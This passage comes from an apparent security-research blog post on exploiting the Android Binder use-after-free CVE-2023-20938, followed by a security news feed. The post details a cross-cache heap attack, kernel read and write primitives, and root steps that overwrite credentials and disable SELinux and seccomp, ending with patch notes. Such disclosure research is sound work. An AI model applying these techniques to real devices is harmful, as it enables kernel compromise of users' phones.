inode structures. We can perform an unlink write to modify the inode pointer to point to a struct epitem that we know the address of. As we can directly control the event.data field (located at the offset of 40 bytes from the beginning of the structure) in the struct epitem with epoll_ctl to point it to anywhere in kernel address space, then we can easily modify the i_sb field (also located at the offset 40) shown above with any arbitrary value. Then, we can use the FIGETBSZ ioctl and epoll_ctl as our arbitrary read primitive to read a 4-byte value from anywhere in the kernel address space. BUT, we must first know the kernel addresses of a struct file and a struct epitem objects. Leak struct file address The struct epitem contains two kernel pointers (next and prev) at offsets 88 and 96 correspondingly. gdb> ptype /o struct epitem /* offset | size */ type = struct epitem { ... /* 88 | 16 */ struct list_head { /* 88 | 8 */ struct list_head *next /* 96 | 8 */ struct list_head *prev; } fllink; These two kernel pointers (next and prev) form a linked list of struct epitem objects. The head of the linked list is located at struct file.f_ep_links. When we use the leak primitive to leak those kernel pointers back to the userspace, one of those pointers will point to a struct file object. Allocating a struct epitem on top of the freed binder_node was straightforward in the previous exploit for CVE-2020-0041 targeting kernel version 4.9. Both struct epitem and binder_node are allocated from the same kmalloc-128 SLAB cache due to cache aliasing and the kmalloc-128 SLAB cache works in a FIFO manner. Therefore, after freeing the binder_node, we could allocate a struct epitem from the same memory location where the binder_node was. Cache aliasing is a kernel feature which merges multiple SLAB caches into one single SLAB cache for efficiency purposes. This happens when those SLAB caches hold similar size objects and share similar attributes. More details on cache aliasing can be found in Linux kernel heap feng shui in 2022 blog. In kernel version 5.10, a commit added the SLAB_ACCOUNT flag to the eventpoll_epi SLAB cache, so the eventpoll_epi and kmalloc-128 no longer share the same SLAB cache. In other words, a struct epitem is no longer allocated from the kmalloc-128 SLAB cache, which prevents us from allocating it on top of the freed binder_node immediately. Cross-cache attack Cross-cache attack is a technique to allocate an object on top of another object that is allocated from a different cache. This is possible because there are multiple levels of memory allocators in the kernel and caches from the same level share the same memory allocator higher in their hierarchy. Caches in the SLUB allocator (kmem_cache) acquire a page from the page allocator and use them as a slab. If a kmem_cache releases a page back to the page allocator, another kmem_cache that requires additional memory during allocation will acquire it. Notes: The page allocator is a buddy allocator which has caches for different orders of contiguous free pages. Different kmem_caches use different numbers of contiguous pages as its slab. Fortunately, both kmalloc-128 and eventpoll_epi kmem_caches use order-0 (2^0 = 1) page as a slab. Therefore, we do not have to groom the page allocator when performing a cross-cache attack and we can safely assume that the page allocator acts in a FIFO manner for every page allocated from and released to it. The diagram below shows how a struct epitem can be allocated from the same memory region that was used by a previously freed binder_node. To perform a cross-cache attack, we must release a slab (a 4K page) from the kmalloc-128 back to the page allocator’s per-cpu page cache, so it can be allocated to eventpoll_epi. Each slab in the kmalloc-128 and eventpoll_epi is a 4K page and can hold 32 kernel objects (4096 / 128). To have control over one whole slab, we must allocate 32 binder_objects. Then, we exploit the vulnerability to release all binder_nodes at once and leave dangling pointers pointing to them. However, SLUB allocator does not immediately release the page of the empty slab back to the page allocator, but puts it on the kmalloc-128 cache’s partial list and makes it frozen (by setting struct page.frozen field). Notes: SLUB allocator uses the struct page of the slab to store metadata, such as the number of in-use objects, the next page in the partial list and etc.. Every kmem_cache holds a number of slabs in the partial list, which can be empty or partially-empty, before releasing the empty slabs back to the page allocator. The SLUB allocator tracks the number of free slots in the partial list in the page of the first slab on the list (struct page.pobjects). When the value of pobjects field is larger than the value of kmem_cache.cpu_partial field, the SLUB allocator unfreezes and releases every empty slab back to the page allocator. The set_cpu_partial function determines the value of kmem_cache.cpu_partial and it is 30 for the kmalloc_128. However, as it turned out it’s not sufficient to have 30 empty slots in the partial list to get our empty slabs be released back to the page allocator. At the moment of working on PoC there was an accounting bug in the SLUB allocator that causes the pobjects to keep track of the number of slabs on the partial list instead of empty slots. Therefore, the SLUB allocator starts releasing empty slabs back to the page allocator when the kmalloc-128 has more than 30 slabs in the partial list. In our exploits, we allocate 36 * 32 (number of slabs * number of objects in a slab) binder_nodes and release them all at once. Then, we allocate more than 32 struct epitems to use up all the empty slots on the eventpoll_epi’s partial lists, so eventpoll_epi will allocate new pages from the page allocator. Finally, we use the leak primitive on all dangling nodes to read the values of those two fields at offset 88 and 96. If we have successfully allocated a struct epitem on top of an already freed binder_node, we will find kernel addresses in those fields and one of them is the kernel address of a struct file. Binder buffer allocator We want to fill the whole kmalloc-128 slab with binder_nodes, so we can create dangling pointers to every object in the slab by exploiting the vulnerability, but there is a challenge. slab +---------------+ | *binder_node* |<---- dangling pointer +---------------+ | *binder_node* |<---- dangling pointer +---------------+ | ... | +---------------+ When we send a transaction, Binder also allocates other kernel objects from the kmalloc-128 cache, such as the struct binder_buffer object. The binder_buffer object holds information about the transaction buffer and a pointer to a binder_node owned by the recipient client’s binder_proc. Exploiting the vulnerability turns that pointer to a dangling pointer to the freed binder_node. slab +---------------+ | ... | +---------------+ | binder_buffer |----+ +---------------+ | dangling pointer | *binder_node* |<---+ +---------------+ | ... | +---------------+ However, we cannot free this binder_buffer yet because we need it to trigger the use-after-free for the leak and unlink primitives. Therefore, we must ensure the binder_buffer cannot be allocated from the same kmalloc-128 slab as the binder_nodes. Binder implements its own memory allocator to allocate memory for every incoming transaction and map them to the recipient’s mapped memory map. The memory allocator employs the best-fit allocation strategy and uses the binder_buffer object to keep track of all allocated and free memory regions. When allocating a new transaction buffer, it searches for a free binder_buffer of the same size to reuse. If none is available, it splits a larger free binder_buffer into two: one with the requested size and another with the remaining size. To prevent Binder from allocating a new binder_buffer for every transaction, we can allocate many free binder_buffers in advance by causing memory fragmentation. We can achieve that by sending multiple transactions of varying sizes and selectively releasing some of them. Consequently, this process creates gaps within the memory allocator, which results many free binder_buffer available for reuse in future transactions. Binder buffer allocator +-----------------+----------+-----------------+----------+---------+ | free (24) | used (8) | free (24) | used (8) | ... | +-----------------+----------+-----------------+----------+---------+ Here is a video demonstrating the cross-cache attack: Root To obtain root privileges, we perform the following steps: Use the arbitrary read primitive to find our process’s task_struct and cred structures. struct binder_node *node; struct binder_proc *proc = node->proc; struct task_struct *task = proc->tsk; struct task_struct *cred = task->cred; Overwrite all the ID fields in the struct cred object with 0 (the UID for root). Disable SELinux by overwriting selinux.enforcing field with 0. Enable TIF_SECCOMP in the current task flag and overwrite the seccomp’s mask with 0 to bypass seccomp. Demo Bonus: Arbitrary Write Primitive Although we do not need an arbitrary write primitive to achieve root privilege in our PoC, we would like to provide information on how to obtain write-what-where primite for the reference. Our unlink primitive can write at any arbitrary address writeable in the kernel, but it can only write 0 or a value which is valid (i.e. writeable) kernel address. To achieve a more powerful arbitrary write (write-what-where), we chose to exploit the pointer field buf in the struct seq_file object based on the technique presented in Typhoon Mangkhut exploit chain by 360 Alpha Lab (slides). struct seq_file { char *buf; ... }; The struct seq_file is used by files implemented with the Linux’s seq_file interface, for example /proc/self/comm. When opening the /proc/self/comm file, the kernel creates a struct seq_file and calls the comm_open function. The comm_open passes the comm_show function to the single_open function to define what string to show when the file is read. // fs/proc/base.c static int comm_open(struct inode *inode, struct file *filp) { return single_open(filp, comm_show, inode); } The comm_show copies the current task name into the seq_file->buf buffer ([1] in the listing below). // fs/proc/base.c static int comm_show(struct seq_file *m, void *v) { ... proc_task_name(m, p, false); ... } // fs/proc/array.c void proc_task_name(struct seq_file *m, struct task_struct *p, bool escape) { char *buf; size_t size; char tcomm[64]; ... // `tcomm` is filled with the current task name ... size = seq_get_buf(m, &buf); // buf = m->buf if (escape) { ... } else { ret = strscpy(buf, tcomm, size); // [1] } } We can open the /proc/self/comm file two times to allocate two instances struct seq_file in the kernel. Then, we use the unlink primitive to overwrite struct seq_file->buf field in the first instance to point to the address of struct seq_file->buf field in the second instance. As a result, this enables us to overwrite the struct seq_file->buf field in the second instance to point to any arbitrary kernel address by changing the current task name to the 8-byte value of the target address and calling lseek on the first seq_file’s file descriptor ([2] in the listing below). Calling lseek on the file descriptor will trigger the comm_show function leading to overwriting struct seq_file->buf field in the second instance of the structure with the target address. // [2] Point `seq_file->buf` to arbitrary kernel address prctl(PR_SET_NAME,"\xef\xbe\xad\xde\xff\xff\xff\xff\0", 0, 0, 0); lseek(comm_fd1, 1, SEEK_SET); // comm_fd1 = First seq_file's file descriptor The diagram below shows the layout of the instances of struct seq_file with struct seq_file->buf field pointing at the attacker-chosen address. Then, we can perform similar actions on the second seq_file’s file descriptor to write with data we control by setting the current task name. As a result, this gives us a more powerful arbitrary write (write-what-where) primitive in kernel memory. Bonus: Binder Node reference counting explained Let’s examine the 4 reference counters of a struct binder_node. The local_strong_refs and local_weak_refs keep track of the number of Nodes in all transactions that reference the Node. Remember the Node in a transaction (struct flat_binder_object) has a different data structure from the Node (struct binder_node) that Binder creates internally for bookkeeping. Binder ensures that every binder_node does not go away when there are Nodes in transactions that have references to it. After opening a Binder device file, we call mmap to provide a shared memory map that Binder uses to store data for incoming transactions. Binder implements a buffer allocator to manage that shared memory map, which allocates a struct binder_buffer to occupy a part of the memory map to store an incoming transaction data. The target_node field in the struct binder_buffer references the binder_node that belongs to the receiving client, which increments that binder_node’s local_strong_refs refcount. The internal_strong_refs keep tracks of how many Refs other clients have that are referencing the Node. The diagram below illustrates a scenario where Client A has an incoming transaction that contains two Nodes and Client B has a Ref 0xbeef (binder_ref) that references Client A’s Node 0xbeef (binder_node). Most importantly, it highlights how those data structures increment the reference counters of Node 0xbeef. When Binder assigns a variable to a pointer to a binder_node, it uses the tmp_refs to keep the binder_node alive as long as the pointer is used within its scope. The code below shows a basic example: struct binder_node *node = ...; binder_inc_node_tmpref(node); // Access `node` safely binder_dec_node_tmpref(node); // `node` can no longer be used after this. Otherwise, there can be race conditions. Binder also sets the has_strong_ref and has_weak_ref flags when there is at least one Ref that references the binder_node. The binder_node->refs points to the head of a list of Refs. Remediation & Conclusion The issue described in this blog has been remediated in two Android Security Bulletins: CVE-2023-20938 in 2023-02-01 CVE-2023-21255 in 2023-07-01 CVE-2023-20938 was initially addressed in the February 2023 Android Security Bulletin by back-porting a patch to the vulnerable kernels. However, further analysis reveals that the patch did not fully mitigate the underlying root cause and it was still possible to reach the bug, although, through a different path. As a result, a new CVE-2023-21255 was assigned and the root cause was fully mitigated in the July 2023 Android Security Bulletin. Credits Special thanks to Carlos Llamas, Jann Horn, Seth Jenkins, Octavian Purdila, Xingyu Jin, Farzan Karimi, for their support with technical questions and for reviewing this post.

/posts/attacking-android-binder-analysis-and-exploitation-of-cve-2023-20938/
Hacking Millions of Modems (and Investigating Who Hacked My Modem)
2024-06-03T00:00:00Z | 1717372800

Two years ago, something very strange happened to me while working from my home network. I was exploiting a blind XXE vulnerability that required an external HTTP server to smuggle out files, so I spun up an AWS box and ran a simple Python webserver to receive the traffic from the vulnerable server.

https://samcurry.net/hacking-millions-of-modems
Cato Continues Expansion with New Global Headquarters
2024-06-02T06:59:58Z | 1717311598

Today is an exciting one for us here at Cato. We opened our new, state-of-the-art corporate headquarters in the scenic Sarona neighborhood of Tel Aviv, Israel. The new offices span 17,000 square meters, more than triple the size of our previous headquarters (also based in Sarona).   The increased office space reflects how far we’ve... The post Cato Continues Expansion with New Global Headquarters   appeared first on Cato Networks.

https://www.catonetworks.com/blog/cato-continues-expansion-with-new-global-headquarters/
Windows Internals: Dissecting Secure Image Objects - Part 1
2024-06-01T00:00:00Z | 1717200000

Analysis of NT, Secure Kernel, and SKCI working together to create the initial SECURE_IMAGE object

/secure-images/
Edge Computing Versus Cloud Computing: Key Similarities and Differences
2024-05-31T13:00:00Z | 1717160400

Explore the use cases, similarities, and differences of edge computing and cloud computing.

https://www.akamai.com/blog/edge/2024/may/edge-computing-versus-cloud-computing-key-similarities-differences
The National Cyber Security Centre Finland’s weekly review – 22/2024
2024-05-31T12:39:16Z | 1717159156

This week, we take a look at how organisations can map the information security of their own services and at the risk management obligation of the NIS2 Directive, among other topics.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centre-finlands-weekly-review-222024
The National Cyber Security Centre Finland’s weekly review – 22/2024
2024-05-31T12:39:16Z | 1717159156

This week, we take a look at how organisations can map the information security of their own services and at the risk management obligation of the NIS2 Directive, among other topics.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centre-finlands-weekly-review-222024
Security Alert (A24-05-24): Multiple Vulnerabilities in Google Chrome
2024-05-31T04:00:00Z | 1717128000

Google released a security update to address multiple vulnerabilities in Google Chrome.

https://www.govcert.gov.hk/en/alerts_detail.php
WAGO and Radiflow partner to strengthen OT security for critical infrastructure
2024-05-30T16:35:42Z | 1717086942

The post WAGO and Radiflow partner to strengthen OT security for critical infrastructure appeared first on Radiflow.

https://industrialcyber.co/news/wago-and-radiflow-partner-to-strengthen-ot-security-for-critical-infrastructure/
CVE-2024-2422
2024-05-30T15:31:00Z | 1717083060

CWE-88: IMPROPER NEUTRALIZATION OF ARGUMENT DELIMITERS IN A COMMAND ('ARGUMENT INJECTION') LenelS2 NetBox access control and event monitoring system was discovered to contain an authenticated remote code execution in versions prior to and including 5.6.1, which allows an attacker to execute malicious commands.

https://claroty.com/team82/disclosure-dashboard/cve-2024-2422
CVE-2024-2421
2024-05-30T15:29:00Z | 1717082940

CWE-78: IMPROPER NEUTRALIZATION OF SPECIAL ELEMENTS USED IN AN OS COMMAND ('OS COMMAND INJECTION') LenelS2 NetBox access control and event monitoring system was discovered to contain an unauthenticated remote code execution in versions prior to and including 5.6.1, which allows an attacker to execute malicious commands with elevated permissions.

https://claroty.com/team82/disclosure-dashboard/cve-2024-2421
CVE-2024-2420
2024-05-30T15:27:00Z | 1717082820

CWE-259: USE OF HARD-CODED PASSWORD LenelS2 NetBox access control and event monitoring system was discovered to contain hard-coded credentials in versions prior to and including 5.6.1, which allows an attacker to bypass authentication requirements.

https://claroty.com/team82/disclosure-dashboard/cve-2024-2420
RedTail Cryptominer Threat Actors Adopt PAN-OS CVE-2024-3400 Exploit
2024-05-30T14:00:00Z | 1717077600

https://www.akamai.com/blog/security-research/2024/may/2024-redtail-cryptominer-pan-os-cve-exploit
Nõusolekuteenuse kasutamine on Eestis hüppeliselt kasvanud
2024-05-30T08:34:02Z | 1717058042

Riigi Infosüsteemi Ameti (RIA) arendatava nõusolekuteenuse kasutus on alates selle aasta aprillikuust Eestis hüppeliselt kasvanud. Teenus võimaldab inimestel anda riigile oma nõusoleku jagada tema isikuandmeid kindla teenusepakkujaga.

https://ria.ee/uudised/nousolekuteenuse-kasutamine-eestis-huppeliselt-kasvanud
AMA: The Business Outcomes of SASE
2024-05-30T07:42:29Z | 1717054949

The post AMA: The Business Outcomes of SASE appeared first on Cato Networks.

https://catonetworks.easywebinar.live/registration-ama-the-business-outcomes-of-sase
What We're Reading: May 2024
2024-05-30T00:00:00Z | 1717027200

Welcome to our Monthly Roundup, where we curate a unique mix of articles, books, podcasts, and more that have captured the attention of the GreyNoise team. From deeply technical articles to literary treasures, join us on this eclectic journey through the media that sparks our curiosity each month. Explore + discover as we share the gems that have fueled our inspiration!

https://www.greynoise.io/blog/what-were-reading-may-2024
Hillstone Networks is Named in Enterprise Firewall Landscape Report
2024-05-29T18:13:33Z | 1717006413

Hillstone Networks Integrative Cybersecurity portfolio includes future-ready, AI-powered firewall platforms supporting all workloads and deployment scenarios. SANTA CLARA, Calif., May 21, 2024 /PRNewswire/ –, Hillstone Networks, a leading provider of cybersecurity solutions, has been included in the Forrester Enterprise Firewall Landscape, Q2 2024 report. The Forrester Landscape Reports offer an overview of a designated market […] The post Hillstone Networks is Named in Enterprise Firewall Landscape Report appeared first on Hillstone Networks.

https://www.hillstonenet.com/more/company/press-releases/hillstone-networks-is-named-in-enterprise-firewall-landscape-report/
Protect and Elevate Your DNS with Akamai Shield NS53
2024-05-29T15:00:00Z | 1716994800

Learn how Akamai Shield NS53 can protect your capital investment into on-premises DNS infrastructure and significantly improve performance.

https://www.akamai.com/blog/security/2024/may/protect-and-elevate-your-dns-with-akamai-shield-ns53
Refining your HTTP perspective, with bambdas
2024-05-29T13:31:49Z | 1716989509

When you open a HTTP request or response, what do you instinctively look for? Suspicious parameter names? CORS headers? Some clue as to the request's origin or underlying purpose? A single HTTP messag

https://portswigger.net/research/adjusting-your-http-perspective-with-bambdas
The New Era of AI Centers
2024-05-29T13:00:00Z | 1716987600

In 1984, Sun was famous for declaring, “The Network is the Computer.” Forty years later we are seeing this cycle come true again with the advent of AI. The collective nature of AI training models relies on a lossless, highly-available network to seamlessly connect every GPU in the cluster to one another and enable peak performance. Networks also connect trained AI models to end users and other systems in the data center such as storage, allowing the system to become more than the sum of its parts. As a result, data centers are evolving into new AI Centers where the networks become the epicenter of AI management.

https://blogs.arista.com/blog/ai-center
The National Cyber Security Centre Finland’s weekly review – 21/2024
2024-05-29T08:29:09Z | 1716971349

Cyber attacks against municipalities have increased, in response to which we remind readers about the importance of the information security of municipalities this week. We also acknowledge the upcoming European Parliament election and provide tips on how to take care of information security during election campaigning.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centre-finlands-weekly-review-212024
The National Cyber Security Centre Finland’s weekly review – 21/2024
2024-05-29T08:29:09Z | 1716971349

Cyber attacks against municipalities have increased, in response to which we remind readers about the importance of the information security of municipalities this week. We also acknowledge the upcoming European Parliament election and provide tips on how to take care of information security during election campaigning.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centre-finlands-weekly-review-212024
Uuring aitab Eesti ettevõtetel tootmist turvaliselt automatiseerida
2024-05-29T07:14:09Z | 1716966849

Tartu Ülikooli teadlased uurisid Riigi Infosüsteemi Ameti (RIA) tellimusel Eesti tööstusettevõtetes tootmise automatiseerimisega kaasnevaid riske ja nende maandamise võimalusi.

https://ria.ee/uudised/uuring-aitab-eesti-ettevotetel-tootmist-turvaliselt-automatiseerida
Simplify 5G Fixed Wireless Access and Scale Secure Connectivity to More Places
2024-05-29T07:03:19Z | 1716966199

Cisco introduces its first 5G Standalone (SA) fixed wireless access devices, the Meraki MG52 and MG52E. Powered by the Cisco secure networking platform, these devices help businesses scale robust, always-on, 5G-connected experiences to more people and places — without compromising scale and performance. The post Simplify 5G Fixed Wireless Access and Scale Secure Connectivity to More Places appeared first on The Meraki Blog.

https://meraki.cisco.com/blog/2024/05/simplify-5g-fixed-wireless-access-and-scale-secure-connectivity-to-more-places/
2024 Q3 Vulnerability Forecast
2024-05-29T00:30:00Z | 1716942600

As usual we like to verify our previous forecast before we make the next one. Due to travel, I must do this a few days before I should (normally on the 1st of June).

https://www.first.org/blog/20240529-Q3Vulnerability-Forecast
2024 Q3 Vulnerability Forecast
2024-05-29T00:30:00Z | 1716942600

As usual we like to verify our previous forecast before we make the next one. Due to travel, I must do this a few days before I should (normally on the 1st of June).

https://www.first.org/blog/20240529-Q3Vulnerability-Forecast
UK and US host international dialogue to advance cyber support for groups that strengthen democracy
2024-05-28T13:38:12Z | 1716903492

Agency heads from nine countries share insights and approaches to help improve collective cyber resilience of global democracy.

https://www.ncsc.gov.uk/news/uk-us-host-international-dialogue-advance-cyber-support-for-strengthen-democracy
UK’s tech innovators urged to join fight against ransomware threat
2024-05-28T13:37:18Z | 1716903438

Opportunity for cyber security startups with ideas to protect small businesses to work with the NCSC's cyber security experts.

https://www.ncsc.gov.uk/news/uk-tech-innovators-urged-to-join-fight-against-ransomware-threat
Potential phishing activity update
2024-05-28T13:35:49Z | 1716903349

The National Cyber Security Centre warns about potential scams during the period of national mourning.

https://www.ncsc.gov.uk/news/potential-phishing-activity-update
Registration opens for the first CYBERUK conference in Northern Ireland
2024-05-28T13:22:06Z | 1716902526

The NCSC is now accepting applications for delegates to take part in CYBERUK 2023 next April in Belfast.

https://www.ncsc.gov.uk/news/registration-opens-for-first-cyberuk-conference-in-northern-ireland
NCSC marks 20th anniversary of first response to state-sponsored cyber attack
2024-05-28T13:16:09Z | 1716902169

In June 2003, GCHQ experts were involved in responding to a cyber attack against the UK Government for the first time.

https://www.ncsc.gov.uk/news/20th-anniversary-of-first-response-to-state-sponsored-cyber-attack
NCSC warns of emerging threat to critical national infrastructure
2024-05-28T13:15:16Z | 1716902116

Alert issued warns of the emerging threat from state-aligned groups and the different forms of activity.

https://www.ncsc.gov.uk/news/ncsc-warns-of-emerging-threat-to-critical-national-infrastructure
Solicitors urged to help stem the rising tide of ransomware payments
2024-05-28T12:58:04Z | 1716901084

The NCSC and ICO share joint letter with the Law Society after increases in ransomware payments.

https://www.ncsc.gov.uk/news/solicitors-urged-to-help-stem-the-rising-tide-of-ransomware-payments
New analysis highlights strength of Ukraine's defence against “unprecedented” Russian offensive
2024-05-28T12:56:42Z | 1716901002

Report from the European Cyber Conflict Research Initiative (ECCRI) gives new insights into the role of cyber criminals and political hacktivists in a conflict, and critical questions around industry support to Ukraine's cyber resilience.

https://www.ncsc.gov.uk/news/new-analysis-eccri-highlights-ukraine-defence-against-russian-offensive
UK cyber chief: "AI should be developed with security at its core"
2024-05-28T12:51:10Z | 1716900670

NCSC CEO, Lindy Cameron's speech emphasised the importance of building security into AI technologies from the outset.

https://www.ncsc.gov.uk/news/uk-cyber-chief-ai-should-be-developed-with-security-at-its-core
Peace process accelerated Northern Ireland's rise as global cyber security hub, UK cyber chief says
2024-05-28T12:48:36Z | 1716900516

Northern Ireland continues to play a critical role in securing UK-wide online resilience 25 years after the pivotal accord was signed.

https://www.ncsc.gov.uk/news/peace-process-accelerated-northern-irelands-rise-global-cyber-security-hub-uk-cyber-chief-says
Security updates released for Microsoft Exchange Servers
2024-05-28T12:45:26Z | 1716900326

The NCSC is encouraging organisations to install critical updates following a number of vulnerabilities being addressed in Microsoft Exchange.

https://www.ncsc.gov.uk/news/security-updates-released-microsoft-exchange-server
NCSC launches package of support to help retailers protect themselves and their customers online
2024-05-28T12:44:12Z | 1716900252

New guidance for retailers on choosing the right authentication methods and removing malicious websites.

https://www.ncsc.gov.uk/news/ncsc-launches-package-of-support-to-help-retailers-protect-themselves-and-their-customers-online
AutomationDirect P3-550E Programming Software Connection Remote Memory Diagnostics Read-What-Where vulnerability
2024-05-28T00:00:00Z | 1716854400

https://talosintelligence.com/vulnerability_reports/TALOS-2024-1941
Foxit Reader Updater improper certificate validation privilege escalation vulnerability
2024-05-28T00:00:00Z | 1716854400

https://talosintelligence.com/vulnerability_reports/TALOS-2024-1989
libigl readNODE out-of-bounds write vulnerability
2024-05-28T00:00:00Z | 1716854400

https://talosintelligence.com/vulnerability_reports/TALOS-2024-1930
AutomationDirect P3-550E Programming Software Connection scan_lib.bin library code injection vulnerability
2024-05-28T00:00:00Z | 1716854400

https://talosintelligence.com/vulnerability_reports/TALOS-2024-1943
AutomationDirect P3-550E Telnet Diagnostic Interface leftover debug code vulnerability
2024-05-28T00:00:00Z | 1716854400

https://talosintelligence.com/vulnerability_reports/TALOS-2024-1942
AutomationDirect P3-550E Programming Software Connection Remote Memory Diagnostics Write-What-Where vulnerability
2024-05-28T00:00:00Z | 1716854400

https://talosintelligence.com/vulnerability_reports/TALOS-2024-1940
AutomationDirect P3-550E Programming Software Connection FileSelect stack-based buffer overflow vulnerability
2024-05-28T00:00:00Z | 1716854400

https://talosintelligence.com/vulnerability_reports/TALOS-2024-1939
AutomationDirect P3-550E Programming Software Connection CurrDir heap-based buffer overflow vulnerability
2024-05-28T00:00:00Z | 1716854400

https://talosintelligence.com/vulnerability_reports/TALOS-2024-1937
AutomationDirect P3-550E Programming Software Connection FiBurn heap-based buffer overflow vulnerability
2024-05-28T00:00:00Z | 1716854400

https://talosintelligence.com/vulnerability_reports/TALOS-2024-1936
libigl readMSH improper array index validation vulnerability
2024-05-28T00:00:00Z | 1716854400

https://talosintelligence.com/vulnerability_reports/TALOS-2024-1926
libigl PlyFile ply_cast_ascii out-of-bounds write vulnerability
2024-05-28T00:00:00Z | 1716854400

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1879
libigl readOFF stack-based buffer overflow vulnerabilities
2024-05-28T00:00:00Z | 1716854400

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1784
libigl readOFF stack-based buffer overflow vulnerability
2024-05-28T00:00:00Z | 1716854400

https://talosintelligence.com/vulnerability_reports/TALOS-2024-1929
AutomationDirect P3-550E Programming Software Connection FileSystem API out-of-bounds write vulnerabilities
2024-05-28T00:00:00Z | 1716854400

https://talosintelligence.com/vulnerability_reports/TALOS-2024-1938
libigl readMSH out-of-bounds read vulnerability
2024-05-28T00:00:00Z | 1716854400

https://talosintelligence.com/vulnerability_reports/TALOS-2024-1928
Cybersecurity in the Age of AI: What Experts are Saying
2024-05-28T00:00:00Z | 1716854400

In this post we explore the significant shift in the cybersecurity landscape driven by AI advancements. Featuring insights from a panel of seasoned security experts, the blog delves into current misconceptions, exciting developments, and surprising findings in AI-driven cybersecurity.

https://www.greynoise.io/blog/cybersecurity-in-the-age-of-ai-what-experts-are-saying
CVE-2024-27776
2024-05-27T14:42:00Z | 1716820920

CWE-22 Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') may allow Unauthenticated RCE Successful exploitation of these vulnerabilities could allow an attacker to execute unauthorized code on the platform.

https://claroty.com/team82/disclosure-dashboard/cve-2024-27776
CVE-2024-36388
2024-05-27T14:41:00Z | 1716820860

CWE-305 Missing Authentication for Critical Function Missing Authentication for Critical Function may allow Authentication Bypass Successful exploitation of these vulnerabilities could allow an attacker to execute unauthorized code on the platform

https://claroty.com/team82/disclosure-dashboard/cve-2024-36388
CVE-2024-36389
2024-05-27T14:40:00Z | 1716820800

CWE-330 Use of Insufficiently Random Values may allow Authentication Bypass Successful exploitation of these vulnerabilities could allow an attacker to execute unauthorized code on the platform.

https://claroty.com/team82/disclosure-dashboard/cve-2024-36389
CVE-2024-36390
2024-05-27T14:38:00Z | 1716820680

CWE-20 Improper Input Validation: Improper Input Validation may allow Denial of Service. Successful exploitation of these vulnerabilities could allow an attacker to execute unauthorized code on the platform.

https://claroty.com/team82/disclosure-dashboard/cve-2024-36390
CVE-2024-36391
2024-05-27T14:36:00Z | 1716820560

CWE-320: Key Management Errors: Successful exploitation of these vulnerabilities could allow an attacker to execute unauthorized code on the platform.

https://claroty.com/team82/disclosure-dashboard/cve-2024-36391
CVE-2024-36392
2024-05-27T14:34:00Z | 1716820440

CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting'): Successful exploitation of these vulnerabilities could allow an attacker to execute unauthorized code on the platform.

https://claroty.com/team82/disclosure-dashboard/cve-2024-36392
Demystifying OT Cybersecurity Solutions: A Step-by-Step Guide to Finding Your Perfect Fit
2024-05-27T06:54:44Z | 1716792884

Operational Technology (OT) cybersecurity is critical for protecting industrial systems, including manufacturing, energy, transportation, maritime, and other infrastructures. With the convergence of IT and OT and the rapid expansion of IIoT, securing these environments is more complex – and urgent – than ever.  Radiflow works with OT customers around the world, accompanying them on their […] The post Demystifying OT Cybersecurity Solutions: A Step-by-Step Guide to Finding Your Perfect Fit appeared first on Radiflow.

https://www.radiflow.com/blog/demystifying-ot-cybersecurity-solutions-a-step-by-step-guide-to-finding-your-perfect-fit/
High Threat Security Alert (A24-05-23): Multiple Vulnerabilities in Microsoft Edge
2024-05-27T04:00:00Z | 1716782400

Microsoft released a security update to address multiple vulnerabilities in Microsoft Edge.

https://www.govcert.gov.hk/en/alerts_detail.php
EDR-Killing Malware and the Need for Network Detection
2024-05-24T13:03:18Z | 1716555798

A recent blog by Elastic Security Labs details GHOSTENGINE, a crypto miner that leverages an intrusion set (HIDDENSHOVEL) to disable endpoint security solutions (EDRs) on a victim host. While crypto miners may not pose a grave threat to an enterprise, the usage of anti-EDR functions is dangerous and likely to increase in prevalence. In today's cybersecurity landscape, confidence and reliance upon an enterprise endpoint solution are commonplace; this further increases when leveraging XDR capabilities to add network detection functions. While EDR is a critical component of any cybersecurity framework, Network Detection and Response (NDR) solutions play an equally important role as new vulnerabilities emerge.

https://www.ironnet.com/blog/edr-killing-malware-need-network-detection-ndr
High Threat Security Alert (A24-05-20): Multiple Vulnerabilities in Ivanti Products
2024-05-24T04:00:00Z | 1716523200

Ivanti has released security advisories to address multiple vulnerabilities in Ivanti products.

https://www.govcert.gov.hk/en/alerts_detail.php
High Threat Security Alert (A24-05-21): Multiple Vulnerabilities in Git
2024-05-24T04:00:00Z | 1716523200

Git has released security advisories to address multiple vulnerabilities in Git products.

https://www.govcert.gov.hk/en/alerts_detail.php
High Threat Security Alert (A24-05-22): Vulnerability in Google Chrome
2024-05-24T04:00:00Z | 1716523200

Google released a security update to address a vulnerability in Google Chrome.

https://www.govcert.gov.hk/en/alerts_detail.php
CVE-2024-5244
2024-05-23T14:30:00Z | 1716474600

This vulnerability allows network-adjacent attackers to access or spoof DDNS messages on affected installations of TP-Link Omada ER605 routers. Authentication is not required to exploit this vulnerability. However, devices are vulnerable only if configured to use the Comexe DDNS service. The specific flaw exists within the cmxddnsd executable. The issue results from reliance on obscurity to secure network data. An attacker can leverage this in conjunction with other vulnerabilities to execute arbitrary code in the context of root.

https://claroty.com/team82/disclosure-dashboard/cve-2024-5244
CVE-2024-5243
2024-05-23T14:29:00Z | 1716474540

This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of TP-Link Omada ER605 routers. Authentication is not required to exploit this vulnerability. However, devices are vulnerable only if configured to use the Comexe DDNS service. The specific flaw exists within the handling of DNS names. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a buffer. An attacker can leverage this vulnerability to execute code in the context of root.

https://claroty.com/team82/disclosure-dashboard/cve-2024-5243
CVE-2024-5242
2024-05-23T14:28:00Z | 1716474480

This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of TP-Link Omada ER605 routers. Authentication is not required to exploit this vulnerability. However, devices are vulnerable only if configured to use the Comexe DDNS service. The specific flaw exists within the handling of DDNS error codes. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root.
